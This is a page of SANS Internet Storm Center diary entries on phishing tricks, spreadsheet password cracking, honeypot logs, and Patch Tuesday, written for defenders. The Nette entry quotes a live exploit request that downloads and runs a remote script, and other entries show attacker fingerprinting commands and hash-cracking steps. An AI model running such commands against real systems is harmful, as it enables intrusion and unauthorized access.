Diaries

Published: 2024-07-16

"Reply-chain phishing" with a twist

Few weeks ago, I was asked by a customer to take a look at a phishing message which contained a link that one of their employees clicked on. The concern was whether the linked-to site was only a generic credential stealing web page or something targeted/potentially more dangerous. Luckily, it was only a run-of-the-mill phishing kit login page, nevertheless, the e-mail message itself turned out to be somewhat more interesting, since although it didn’t look like anything special, it did make it to the recipient’s inbox, instead of the e-mail quarantine where it should have ended up.

The reason for this probably was that the message in question contained what looked like a reply to a previous e-mail exchange. This might have made it appear more trustworthy to the spam/phishing detection mechanisms that were employed to scan it, since – as far as my understanding goes – automated spam/phishing detection mechanisms tend to consider messages with reply-chains to be somewhat more trustworthy than plain, unsolicited e-mails from unknown senders.

It should be mentioned that threat actors commonly use replies to legitimate messages in account takeover/BEC-style phishing attacks, however, in this case, the situation was somewhat different – the original (replied-to) message was from someone not associated with the targeted organization in any way. Use of this approach (i.e., “replying” to a message with no relevance to the recipient) can sometimes be seen in generic phishing, however, if someone receives an e-mail which contains a reply to a message from someone they have never even heard of, it doesn’t exactly make the message appear trustworthy… Which is where the slight twist, which was used in this message, comes in.

In the message, the ”reply” part was hidden from the recipient bellow a long list of empty paragraphs (well, paragraphs containing a non-breaking space). And although this technique is not new, since the aforementioned customer’s IT specialists weren’t aware of it, and a quick Google search failed to provide any write-ups of it, I thought it might be worthwhile to go over it here.

As the following example from my “phishing collection” shows, at first glance, an e-mail messages, in which this technique is used, would look quite normal, and a recipient might not notice anything suspicious (besides the overall “this is an obvious phishing” vibe).

Only if one noticed that the scrollbar on the right side of the window seems to indicate that there is (literally) much more to the message than it appears to be, would one probably discover the text of the original reply-chain... Which, in this instance, is hidden bellow 119 empty paragraphs.

Although the aforementioned technique is hardly the most common (or most dangerous) one when it comes to phishing, since it is being used “in the wild”, a short mention of it might make a good addition to any security awareness training (e.g., something along the lines of “if you see a large scrollbar next to the body of a short e-mail, it is a definite indicator that something is amiss”)…

-----------
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting

0 Comments

Published: 2024-07-15

Protected OOXML Spreadsheets

I was asked a question about the protection of an .xlsm spreadsheet. I've written before on the protection of .xls spreadsheets, for example in diary entries "Unprotecting Malicious Documents For Inspection" and "16-bit Hash Collisions in .xls Spreadsheets"; and blog post "Quickpost: oledump.py plugin_biff.py: Remove Sheet Protection From Spreadsheets".

.xlsm spreadsheats (and .xlsx) are OOXML files, and are thus ZIP files containing mostly XML files:

The spreadsheet I'm taking as an example here, has a protected sheet. Let's take a look at the XML file for this sheet by piping zipdump.py's output into xmldump.py:

XML element sheetProtection protects this sheet. If you remove this element, the sheet becomes unprotected.

The password used to protect this sheet, is hashed and the hashvalue is stored as an attribute of element sheetProtection.

Let's print out each attribute on a different line:

The password is hashed hundred thousand times (attribute spinCount) with SHA-512 (attribute algorithmName) together with a salt (attribute saltValue, base64 encoded). This result is stored in attribute hashValue (base64 encoded).

Here is the algorithm in Python:

def CalculateHash(password, salt):
    passwordBytes = password.encode('utf16')[2:]
    buffer = salt + passwordBytes
    hash = hashlib.sha512(buffer).digest()
    for iter in range(100000):
        buffer = hash + struct.pack('<I', iter)
        hash = hashlib.sha512(buffer).digest()
    return hash

def Verify(password, salt, hash):
    hashBytes = binascii.a2b_base64(hash)
    return hashBytes == CalculateHash(password, binascii.a2b_base64(salt))

Spreadsheet protected-all.xlsx is a spreadsheet I created with 3 types of protections: modification protection, workbook protection and sheet protection:

I released a new version of xmldump.py to extract these hashes and format them for hashcat:

For each extracted hash, the lines are:

  1. the name of the containing file
  2. the name of the protecting element (which can be removed should you want to disable that particular protection)
  3. the hashcat compatibel hash (hash mode 25300)
  4. a hashcat command to crack this hash with a wordlist

You can imagine that cracking these hashes with hashcat is rather slow, because 100,000 SHA-256 hash operations need to be executed for each candidate password. On a desktop with a NVIDIA GeForce RTX 3080 GPU, I got around 24,000 hashes per second.

Didier Stevens
Senior handler
blog.DidierStevens.com

0 Comments

Published: 2024-07-14

Wireshark 4.2.6 Released

Wireshark release 4.2.6 fixes 1 vulnerability (SPRT parser crash) and 10 bugs.

Didier Stevens

Senior handler
blog.DidierStevens.com

 

0 Comments

Published: 2024-07-13

16-bit Hash Collisions in .xls Spreadsheets

A couple years ago, in diary entry "Unprotecting Malicious Documents For Inspection" I explain how .xls spreadsheets are password protected (but not encrypted). And in follow-up diary entry "Maldocs: Protection Passwords", I talk about an update to my oledump plugin plugin_biff.py to crack these passwords using password lists (by default, an embedded password list is used that is taken from the 2011 public-domain default password list used by John The Ripper).

Since the hashing algorithm used for the protection of .xls files produces a 16-bit integer with its highest bit set, there are 32768 (0x8000) possible hash values (called verifier), and thus ample chance to generate hash collisions.

I generated such a list, and included it in an update of my oledump plugin plugin_biff.py:

I took care to generate passwords prioritizing letters and digits over special characters.

Here is an example of a .xls workbook with a protected sheet. The protection password I used for this sheet is azeqsdwxc, a weak password that is not in the embedded list. Thus this password is not found in the password list when plugin plugin_biff.py attempts to crack it:

With previous versions of plugin plugin_biff.py, the report would state that the password was not cracked. But in this new version, when a password can not be cracked with the embedded or provided password list, the password is taken from the embedded verifier table. In this case, that password is bbbbhz (the verifier is 0xd9b1).

This means that both password azeqsdwxc and bbbbhz hash to the same value: verifier 0xd9b1.

And thus that the sheet can also be unprotected with password bbbbhz too:

So with this new version of oledump plugin plugin_biff.py, a password will always be provided for protected .xls files, whatever the value of the verifier.

Of course, this is only useful if you don't want or can't alter the sheet to remove the protection. Since these passwords just offer protection, and are not actually used to encrypt, it's possible to remove the protection without knowing the password, as I explained in my blog post "Quickpost: oledump.py plugin_biff.py: Remove Sheet Protection From Spreadsheets".

 

Didier Stevens
Senior handler
blog.DidierStevens.com

0 Comments

Published: 2024-07-12

Attacks against the "Nette" PHP framework CVE-2020-15227

Today, I noticed some exploit attempts against an older vulnerability in the "Nette Framework", CVE-2020-15227 [1].

Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

Today, I noticed yet another variation of an exploit vor CVE-2020-15227:

 /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

Even though the exploit is old, and the line above loads a simple DDoS agent, the agent itself has not been uploaded to Virustotal yet [2]. 

The malware was written in Go, and Virustotal's "Behaviour" analysis does a pretty good job in summarizing the binary.

  • The binary uses crontab and systemd for persistence.
  • it uses sosbot.icu on port 1314 for command and control
  •  

[1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
[2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2024-07-11

Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots

Some of the commands observed can be confusing for a novice looking at ssh honeypot logs. Sure, you have some obvious commands like "uname -a" to fingerprint the kernel. However, other commands are less intuitive and are not commands a normal user would use. I am trying to summarize some of the more common ones here, focusing on commands attackers use to figure out if they are inside a honeypot.

busybox dd if=$SHELL bs=22 count=1||dd if=/proc/self/exe bs=22 count=1||while read i;do busybox echo -n $i;done</proc/self/exe||cat /proc/self/exe

There is a lot going on with this line. Let's take it apart one command at a time:

busybox: Busybox is a special binary found on many IoT style systems. It fulfills the role of various other Linux utilities in one small package. It is often symlinked from other names like "ls". 

dd: "dd" (disk dump) is often used to copy disk images. But it can be used to read/write any binary file. Here the attacker reads the first 22 bytes of the "$SHELL" binary, usually something like "/bin/bash". A typical output would be " ELF>" for an ELF binary.

Next, the attacker is doing the same to the current binary (/proc/self/exe). I believe the purpose of this command line may be to eliminate some honeypots as this command will not work in simulations like cowrie.

I have seen variations of this like for example:

dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s

/bin/busybox dd if=/bin/busybox bs=22 count=1||while read i;do /bin/busybox echo -n $i;done</bin/busybox||cat /proc/self/exe

The next line uses a slightly different trick to figure out if the attacker is inside a honeypot:

cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox ZRKTA

/dev/shm is the "ramdisk", a special file system found on most Linux systems. Here the attacker just copies a file to it to see if the copy succeeds. The attacker first views the content of the file ".s", and later copies the echo command to .s just to see if there are any errors. The busybox command at the end just serves as a simple marker to note that the commands completed.

Next a partial command I see a lot:

(/bin/busybox echo -e \"\\x44\\x49\\x52\"||echo -e \"\\x44\\x49\\x52\")

"echo -e" will output the text identified by he ASCII hex codes. The exact output may vary a bit from system to system as "-e" is not a standard option. But you will get something like

$ echo -e \"\\x44\\x49\\x52\"
"DIR"

Adding this as an argument to busybox is an attempt to execute a "DIR" command. The goal is not to execute the "DIR" command (it does not exist in Linux). Instead, seeing the "DIR" output will tell the attacker that the command succeeded. 

Seen any other tricks used by attackers lately? Any questions about an odd command logged by cowrie? Let me know! :) 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2024-07-10

Finding Honeypot Data Clusters Using DBSCAN: Part 1

Sometimes data needs to be transformed or different tools need to be used so that it can be compared with other data. Some honeypot data is easy to compare since there is no customized information such as randomly generated file names, IP addresses, etc.


Figure 1: Common commands seen across multiple honeypots

 

The examples above are easy to compare and from the most commonly seen commands used, there is a large overlap seen by different honeypots. Are those the most common commands? What about commands that are very similar, but have small differences?


Figure 2: Commands used to change passwords, but with differences in the username or password supplied.

 

Password change attempts are just one example of commands that are very similar, with small changes in input. From the dataset, there are 77,214 instances of "passwd" being used in a command. This means that it could be the most commonly used command seen for all of the honeypots. It's been seen over 20,000 more times than the top command seen in Figure 1. From this quick filter using DB Browser for SQLite [1], very quickly a list of possibly similar commands was generated. With only 80,715 total rows, almost 97% of the commands might be password changes. An option would be to take the list as it is. Unfortunately, this can imply a grouping that may not be desired. There are some commands that also contain "passwd", but are not strictly password changes. In the example below, we see a contatenated command that includes creating a user account and setting a new password for it. It would be nice to get a list of similar commands.


Figure 3: Commands with "passwd", but fom very different commands

 

DBSCAN (Density-Based Spatial Clustering of Applications with Noise)

DBSCAN [2] was introduced to me in SEC 595, Applied Data Science and AI/Machine Learning for Cybersecurity Professionals [3]. To start out, I need to dermine the following:

  • Dataset
  • Features (features of the data that help to separate data into different clusters)
  • Minimum Samples (min_samples)
  • Epsilon (eps)

Dataset

To help reduce the data to be analized, a subset of the orignial data was used. Only rows with at least honeypot not having any results was extracted.

# unique_commands holds data read from SQLite file
# get any rows that contain a 0
unique_commands = commands[(commands == 0).any(axis=1)]

# 'index' is the column of commands
# extract the "index" column
unique_commands = unique_commands.loc[:, :"index"]

 

Features

As a starting point, I decided to see what would happen when just trying to use character frequencies as features. Some characters were selected based on what is seen within the data.

# using string to take advantage of built in character collections
import string

# create a list with all characters to count (get a frequency for)
chars_to_count = list(string.ascii_uppercase) + list(string.ascii_lowercase)
chars_to_count += [";", "\\/", "\\//", "\\=", "\\$", " ", ",", "_", ".", "\\%", "\\&"]

# add columns for each character, including the count for that character seen within each command
for each_char in chars_to_count:
    unique_commands[each_char] = unique_commands[column_label].str.count(each_char)

# Comparisons used: ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 
# 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 
# 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', ';', '\
# \/', '\\//', '\\=', '\\$', ' ', ',', '_', '.', '\\%', '\\&']

 

Minimum Samples and Epsilon

I decided to experimentally change "min_samples" and "eps" to see how it impacted the number of clusters created and what was created within those clusters. In general, the following is true:

  • Lower "eps" = more clusters
  • Lower "min_samples" = more clusters
# 3, 4, 5, 6, 7, 8, 9, 10, 11 for min_samples
minsamples_values = range(3, 11, 1)

# .5 to 2.5, incrementing by .1
eps_values = []
current_value = .5
limit = 2.5
while current_value <= limit:
    eps_values.append(current_value)
    current_value = round(current_value + .1, 1)

 

Cluster Differences

Min Number of Clusters:5
Max Number of Clusters: 73
Average: 18


Figure 4: Plot of the number of clusters formed based on "eps" and "min_samples" value changes.

 

Overall, the data was not surpising in thta lower "eps" values and "min_sample" values created more clusters. Let's take a look at the middle for a low "min_sample" value with a cluster size of 46 (eps=0.7, min_samples=3).

 


Figure 5: Except of clutered data with an incorrect cluster highlighted

Cluster 5 shows some promise in terms of the clusters being created. Cluster 6 shows an outlier but overall still looks very good. One of the challenges from the data being used is:

  • High number of features
  • Number of characters (len) is causing inaccurate clustering and could be weighted too high
  • Some characters present in the data not being used as features ("@", "<", ">", and "=" not represented)

 

Changing Features

To see if changing the features could help, the features were changed and included only special characters seen within the data (numbers and letters were filtered out).

# create a dictionary that contains every character and the number of times it is represented
command_char_counts = {}
for each_item in unique_commands["index"]:
    for each_char in each_item:

        # exclude numbers
        if not each_char.isdigit():

            #exclude letters
            if not each_char in list(string.ascii_letters):
                if each_char in command_char_counts:
                    command_char_counts[each_char] += 1
                else:
                    command_char_counts[each_char] = 1

# create new columns for special characters seen within the data
for char, count in command_char_counts.items():
    if char == "." or char == "|":
        char = "\\" + char
    try:
        unique_commands[char] = unique_commands[column_label].str.count(char)
    except:
        char = "\\" + char
        unique_commands[char] = unique_commands[column_label].str.count(char)

# Comparisons used: ['/', '>', '@', "'", '#', '!', ';', '=', '$', ':', '\\.', '-', '\\+', '"', '\\
# \\', '\\|', '\\?', '&', '^', '%', '\\[', ']', '<', '\\(', '\\)', ',', '_', '\\*', '{', '}', 
# '\n', '~']

 

This strategy seems like it would help since it is less overall features. Unfortunately, I ran into memory errors after hitting an eps of 1.3.

  • min_samples = 3, eps = 1.2 --> worked
  • min_samples = 3, eps = 1.3 --> memory error on dbscan.fit(reduced)

Since I ran into issues where I could automate a variety of "min_samples" and "eps" values, I decided to try to change features again, aiming for even less features.

 

Changing Features (again)

Based on some of the commands contained within the data, the following features were selected:

  • "appends" (contatenated commands, containing " && ")
  • "args1" (command arguments starting with "+")
  • "args2" (command arguements starting with "-")
  • "outputs" (commands with output " > ")
  • "conditionals" (commands with " if ")
  • "command_parts" (number of individual commands separated by semicolon ";")
  • "length" (total command length)
  • "partn_length (length of the last part, separated by semicolon ";")
  • "partn_minus_1_length" (length of the second last part, separated by semicolon ";")
  • "partn_minus_2_length" (length of the third last part, separated by semicolon ";")
def find_pattern_instance_num(string, pattern):
    return len(re.findall(rf'.*({pattern}).*', string))

def find_part_num(string, splitchars):
    return len(string.split(splitchars))

def find_part_length(string, splitchars, segment):
    try:
        return len(string.split(splitchars)[segment])
    except:
        return 0

appends = [find_pattern_instance_num(index, " && ") for index in unique_commands[column_label]]
args1 = [find_pattern_instance_num(index, " +[A-Za-z] ") for index in unique_commands[column_label]]
args2 = [find_pattern_instance_num(index, " -[A-Za-z] ") for index in unique_commands[column_label]]
outputs = [find_pattern_instance_num(index, " > ") for index in unique_commands[column_label]]
conditionals = [find_pattern_instance_num(index, " if ") for index in unique_commands[column_label]]
command_parts = [find_part_num(index, ";") for index in unique_commands[column_label]]
length = [len(index) for index in unique_commands[column_label]]
partn_length = [find_part_length(index, ';', -1) for index in unique_commands[column_label]]
partn_minus_1_length = [find_part_length(index, ';', -2) for index in unique_commands[column_label]]
partn_minus_2_length = [find_part_length(index, ';', -3) for index in unique_commands[column_label]]

unique_commands["appends"] = appends
unique_commands["args1"] = args1
unique_commands["args2"] = args2
unique_commands["outputs"] = outputs
unique_commands["conditionals"] = conditionals
unique_commands["command_parts"] = command_parts
unique_commands["length"] = length
unique_commands["partn_length"] = partn_length
unique_commands["partn_minus_1_length"] = partn_minus_1_length
unique_commands["partn_minus_2_length"] = partn_minus_2_length

 

Min Number of Clusters:10
Max Number of Clusters: 113
Average: 34.75

Data reviewed: eps = .5, min_samples = 9, clusters = 46

Looking at the original outlier it appears that it is now in cluster "-1", meaning it is grouped as an outlier.


Figure 6: Data previously group incorrectly into a cluster now shown as an outlier

 

This doesn't mean that the clusters perfect or even more accurate overall, but it does show the impact when changing features and other DBSCAN variables. Experimenting with different values can be helpeful when trying to determine the best settings for your data analysis.

Looking back at the original problem, how did things sort out with different commands containing "passwd"?


Figure 7: Commands listed with their associated cluster and total items seen per cluster.

 

The original command that was an issue (cluster 37) is now separated. There are more clusters than desired for the password password change attempts starting with "echo". This could still be classified manually since there are a low number of clusters. The issue here is that the only value being used to cluster this data is the length of the command itself.


Figure 8: Password change cluster showing length as the clustering feature

 

We'll see where this ends up, but some good things to keep in mind when performing clustering:

  • Experiment with different eps, min_samples and features
  • Save data to review later so that it can be used to further tailor your variables
  • Putting some thought into features can help tremendously, but it requires understanding the data

 

[1] https://sqlitebrowser.org/
[2] https://scikit-learn.org/dev/auto_examples/cluster/plot_dbscan.html
[3] https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/

--
Jesse La Grew
Handler

0 Comments

Published: 2024-07-09

Microsoft Patch Tuesday July 2024

Microsoft today released patches for 142 vulnerabilities. Only four of the vulnerabilities are rated as "critical". There are two vulnerabilities that have already been discussed and two that have already been exploited.

Noteworthy Vulnerabilities:

CVE-2024-38080: Windows Hyper-V Elevation of Privilege Vulnerability (exploited vulnerability)

An attacker can obtain SYSTEM privilege by exploiting this integer overflow. 

CVE-2024-38112: Windows MSHTML Platform Spoofing Vulnerability

I haven't seen any details disclosed yet. However, these vulnerabilities typically make it difficult to identify the nature and origin of an attachment. A victim may be tricked into opening a malicious attachment, leading to code execution. There have been numerous similar vulnerabilities in the past.

CVE-2024-35264: .NET and Visual Studio Remote Code Execution Vulnerability (disclosed vulnerability)

CVSS score for this vulnerability is 8.1. It is not considered critical. The vulnerability is exploited by closing an http/3 connection while the body is still being processed. The attacker must take advantage of a race condition to execute code.

CVE-2024-37985: Systematic Identification and Characterization of Proprietary Prefetchers (disclosed vulnerability)

This vulnerability only affects ARM systems. An attacker would be able to view privileged heap memory.

CVE-2024-38074, CVE-2024-38076, CVE-2024-38077: Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability

Three of the four critical vulnerabilities affect the RDP Licensing Service. Watch our for PoC exploits for this vulnerability.

CVE-2024-38060: Windows Imaging Component Remote Code Execution Vulnerability

The WIC is the Windows framework used to parse images and related metadata. Toe trigger the vulnerability, an authenticated attacker must upload a TIFF image to a server.

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
.NET Core and Visual Studio Denial of Service Vulnerability
%%cve:2024-30105%% No No - - Important 7.5 6.5
.NET and Visual Studio Denial of Service Vulnerability
%%cve:2024-38095%% No No - - Important 7.5 6.5
.NET and Visual Studio Remote Code Execution Vulnerability
%%cve:2024-35264%% Yes No - - Important 8.1 7.1
.NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
%%cve:2024-38081%% No No - - Important 7.3 6.4
Arm: CVE-2024-37985 Systematic Identification and Characterization of Proprietary Prefetchers
%%cve:2024-37985%% Yes No - - Important 5.9 5.2
Azure CycleCloud Elevation of Privilege Vulnerability
%%cve:2024-38092%% No No - - Important 8.8 7.9
Azure DevOps Server Spoofing Vulnerability
%%cve:2024-35266%% No No - - Important 7.6 6.6
%%cve:2024-35267%% No No - - Important 7.6 6.6
Azure Kinect SDK Remote Code Execution Vulnerability
%%cve:2024-38086%% No No - - Important 6.4 5.6
Azure Network Watcher VM Extension Elevation of Privilege Vulnerability
%%cve:2024-35261%% No No - - Important 7.8 7.0
BitLocker Security Feature Bypass Vulnerability
%%cve:2024-38058%% No No - - Important 6.8 5.9
CERT/CC: CVE-2024-3596 RADIUS Protocol Spoofing Vulnerability
%%cve:2024-3596%% No No - - Important 7.5 6.5
DCOM Remote Cross-Session Activation Elevation of Privilege Vulnerability
%%cve:2024-38061%% No No - - Important 7.5 6.5
DHCP Server Service Remote Code Execution Vulnerability
%%cve:2024-38044%% No No - - Important 7.2 6.3
Github: CVE-2024-38517 TenCent RapidJSON Elevation of Privilege Vulnerability
%%cve:2024-38517%% No No - - Moderate 7.8 6.8
Github: CVE-2024-39684 TenCent RapidJSON Elevation of Privilege Vulnerability
%%cve:2024-39684%% No No - - Moderate 7.8 6.8
Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
%%cve:2024-38054%% No No - - Important 7.8 6.8
%%cve:2024-38052%% No No - - Important 7.8 6.8
%%cve:2024-38057%% No No - - Important 7.8 6.8
Microsoft Defender for IoT Elevation of Privilege Vulnerability
%%cve:2024-38089%% No No - - Important 9.1 7.9
Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability
%%cve:2024-30061%% No No - - Important 7.3 6.4
Microsoft Message Queuing Information Disclosure Vulnerability
%%cve:2024-38017%% No No - - Important 5.5 5.0
Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
%%cve:2024-37334%% No No - - Important 8.8 7.7
Microsoft Office Remote Code Execution Vulnerability
%%cve:2024-38021%% No No - - Important 8.8 7.7
Microsoft Outlook Spoofing Vulnerability
%%cve:2024-38020%% No No - - Moderate 6.5 5.7
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2024-38094%% No No - - Important 7.2 6.3
Microsoft SharePoint Server Information Disclosure Vulnerability
%%cve:2024-32987%% No No - - Important 7.5 6.5
Microsoft SharePoint Server Remote Code Execution Vulnerability
%%cve:2024-38023%% No No - - Critical 7.2 6.3
%%cve:2024-38024%% No No - - Important 7.2 6.3
Microsoft WS-Discovery Denial of Service Vulnerability
%%cve:2024-38091%% No No - - Important 7.5 6.5
Microsoft Windows Codecs Library Information Disclosure Vulnerability
%%cve:2024-38055%% No No - - Important 5.5 4.8
%%cve:2024-38056%% No No - - Important 5.5 4.8
Microsoft Windows Performance Data Helper Library Remote Code Execution Vulnerability
%%cve:2024-38025%% No No - - Important 7.2 6.3
%%cve:2024-38019%% No No - - Important 7.2 6.3
%%cve:2024-38028%% No No - - Important 7.2 6.3
Microsoft Windows Server Backup Elevation of Privilege Vulnerability
%%cve:2024-38013%% No No - - Important 6.7 5.8
Microsoft Xbox Remote Code Execution Vulnerability
%%cve:2024-38032%% No No - - Important 7.1 6.2
PowerShell Elevation of Privilege Vulnerability
%%cve:2024-38043%% No No - - Important 7.8 6.8
%%cve:2024-38033%% No No - - Important 7.3 6.4
%%cve:2024-38047%% No No - - Important 7.8 6.8
SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability
%%cve:2024-38088%% No No - - Important 8.8 7.7
%%cve:2024-38087%% No No - - Important 8.8 7.7
%%cve:2024-21332%% No No - - Important 8.8 7.7
%%cve:2024-21333%% No No - - Important 8.8 7.7
%%cve:2024-21335%% No No - - Important 8.8 7.7
%%cve:2024-21373%% No No - - Important 8.8 7.7
%%cve:2024-21398%% No No - - Important 8.8 7.7
%%cve:2024-21414%% No No - - Important 8.8 7.7
%%cve:2024-21415%% No No - - Important 8.8 7.7
%%cve:2024-21428%% No No - - Important 8.8 7.7
%%cve:2024-37318%% No No - - Important 8.8 7.7
%%cve:2024-37332%% No No - - Important 8.8 7.7
%%cve:2024-37331%% No No - - Important 8.8 7.7
%%cve:2024-35271%% No No - - Important 8.8 7.7
%%cve:2024-35272%% No No - - Important 8.8 7.7
%%cve:2024-20701%% No No - - Important 8.8 7.7
%%cve:2024-21303%% No No - - Important 8.8 7.7
%%cve:2024-21308%% No No - - Important 8.8 7.7
%%cve:2024-21317%% No No - - Important 8.8 7.7
%%cve:2024-21331%% No No - - Important 8.8 7.7
%%cve:2024-21425%% No No - - Important 8.8 7.7
%%cve:2024-37319%% No No - - Important 8.8 7.7
%%cve:2024-37320%% No No - - Important 8.8 7.7
%%cve:2024-37321%% No No - - Important 8.8 7.7
%%cve:2024-37322%% No No - - Important 8.8 7.7
%%cve:2024-37323%% No No - - Important 8.8 7.7
%%cve:2024-37324%% No No - - Important 8.8 7.7
%%cve:2024-21449%% No No - - Important 8.8 7.7
%%cve:2024-37326%% No No - - Important 8.8 7.7
%%cve:2024-37327%% No No - - Important 8.8 7.7
%%cve:2024-37328%% No No - - Important 8.8 7.7
%%cve:2024-37329%% No No - - Important 8.8 7.7
%%cve:2024-37330%% No No - - Important 8.8 7.7
%%cve:2024-37333%% No No - - Important 8.8 7.7
%%cve:2024-37336%% No No - - Important 8.8 7.7
%%cve:2024-28928%% No No - - Important 8.8 7.7
%%cve:2024-35256%% No No - - Important 8.8 7.7
Secure Boot Security Feature Bypass Vulnerability
%%cve:2024-28899%% No No - - Important 8.8 7.7
%%cve:2024-37969%% No No - - Important 8.0 7.0
%%cve:2024-37970%% No No - - Important 8.0 7.0
%%cve:2024-37974%% No No - - Important 8.0 7.0
%%cve:2024-37981%% No No - - Important 8.0 7.0
%%cve:2024-37986%% No No - - Important 8.0 7.0
%%cve:2024-37987%% No No - - Important 8.0 7.0
%%cve:2024-26184%% No No - - Important 6.8 5.9
%%cve:2024-37971%% No No - - Important 8.0 7.0
%%cve:2024-37972%% No No - - Important 8.0 7.0
%%cve:2024-37973%% No No - - Important 8.4 7.3
%%cve:2024-37975%% No No - - Important 8.0 7.0
%%cve:2024-37977%% No No - - Important 8.0 7.0
%%cve:2024-37978%% No No - - Important 8.0 7.0
%%cve:2024-37984%% No No - - Important 8.4 7.3
%%cve:2024-37988%% No No - - Important 8.0 7.0
%%cve:2024-37989%% No No - - Important 8.0 7.0
%%cve:2024-38010%% No No - - Important 8.0 7.0
%%cve:2024-38011%% No No - - Important 8.0 7.0
%%cve:2024-38065%% No No - - Important 6.8 5.9
Win32k Elevation of Privilege Vulnerability
%%cve:2024-38059%% No No - - Important 7.8 6.8
Windows Cryptographic Services Security Feature Bypass Vulnerability
%%cve:2024-30098%% No No - - Important 7.5 6.5
Windows Distributed Transaction Coordinator Remote Code Execution Vulnerability
%%cve:2024-38049%% No No - - Important 6.6 5.8
Windows Enroll Engine Security Feature Bypass Vulnerability
%%cve:2024-38069%% No No - - Important 7.0 6.1
Windows Fax Service Remote Code Execution Vulnerability
%%cve:2024-38104%% No No - - Important 8.8 7.7
Windows File Explorer Elevation of Privilege Vulnerability
%%cve:2024-38100%% No No - - Important 7.8 6.8
Windows Filtering Platform Elevation of Privilege Vulnerability
%%cve:2024-38034%% No No - - Important 7.8 6.8
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2024-38085%% No No - - Important 7.8 6.8
%%cve:2024-38079%% No No - - Important 7.8 6.8
Windows Graphics Component Remote Code Execution Vulnerability
%%cve:2024-38051%% No No - - Important 7.8 6.8
Windows Hyper-V Elevation of Privilege Vulnerability
%%cve:2024-38080%% No Yes - - Important 7.8 6.8
Windows Image Acquisition Elevation of Privilege Vulnerability
%%cve:2024-38022%% No No - - Important 7.0 6.1
Windows Imaging Component Remote Code Execution Vulnerability
%%cve:2024-38060%% No No - - Critical 8.8 7.7
Windows Kernel Information Disclosure Vulnerability
%%cve:2024-38041%% No No - - Important 5.5 4.8
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
%%cve:2024-38062%% No No - - Important 7.8 6.8
Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability
%%cve:2024-38102%% No No - - Important 6.5 5.7
%%cve:2024-38101%% No No - - Important 6.5 5.7
%%cve:2024-38105%% No No - - Important 6.5 5.7
Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability
%%cve:2024-38053%% No No - - Important 8.8 7.7
Windows Line Printer Daemon Service Denial of Service Vulnerability
%%cve:2024-38027%% No No - - Important 6.5 5.7
Windows LockDown Policy (WLDP) Security Feature Bypass Vulnerability
%%cve:2024-38070%% No No - - Important 7.8 6.8
Windows MSHTML Platform Spoofing Vulnerability
%%cve:2024-38112%% No Yes - - Important 7.5 7.0
Windows MultiPoint Services Remote Code Execution Vulnerability
%%cve:2024-30013%% No No - - Important 8.8 7.7
Windows NTLM Spoofing Vulnerability
%%cve:2024-30081%% No No - - Important 7.1 6.2
Windows Network Driver Interface Specification (NDIS) Denial of Service Vulnerability
%%cve:2024-38048%% No No - - Important 6.5 5.7
Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability
%%cve:2024-38031%% No No - - Important 7.5 6.5
%%cve:2024-38067%% No No - - Important 7.5 6.5
%%cve:2024-38068%% No No - - Important 7.5 6.5
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
%%cve:2024-30079%% No No - - Important 7.8 6.8
Windows Remote Access Connection Manager Information Disclosure Vulnerability
%%cve:2024-30071%% No No - - Important 4.7 4.1
Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability
%%cve:2024-38015%% No No - - Important 7.5 6.5
Windows Remote Desktop Licensing Service Denial of Service Vulnerability
%%cve:2024-38071%% No No - - Important 7.5 6.5
%%cve:2024-38072%% No No - - Important 7.5 6.5
%%cve:2024-38073%% No No - - Important 7.5 6.5
%%cve:2024-38099%% No No - - Important 5.9 5.2
Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
%%cve:2024-38077%% No No - - Critical 9.8 8.5
%%cve:2024-38074%% No No - - Critical 9.8 8.5
%%cve:2024-38076%% No No - - Critical 9.8 8.5
Windows TCP/IP Information Disclosure Vulnerability
%%cve:2024-38064%% No No - - Important 7.5 6.5
Windows Text Services Framework Elevation of Privilege Vulnerability
%%cve:2024-21417%% No No Less Likely Less Likely Important 8.8 7.7
Windows Themes Spoofing Vulnerability
%%cve:2024-38030%% No No - - Important 6.5 5.7
Windows Win32k Elevation of Privilege Vulnerability
%%cve:2024-38066%% No No - - Important 7.8 6.8
Windows Workstation Service Elevation of Privilege Vulnerability
%%cve:2024-38050%% No No - - Important 7.8 6.8
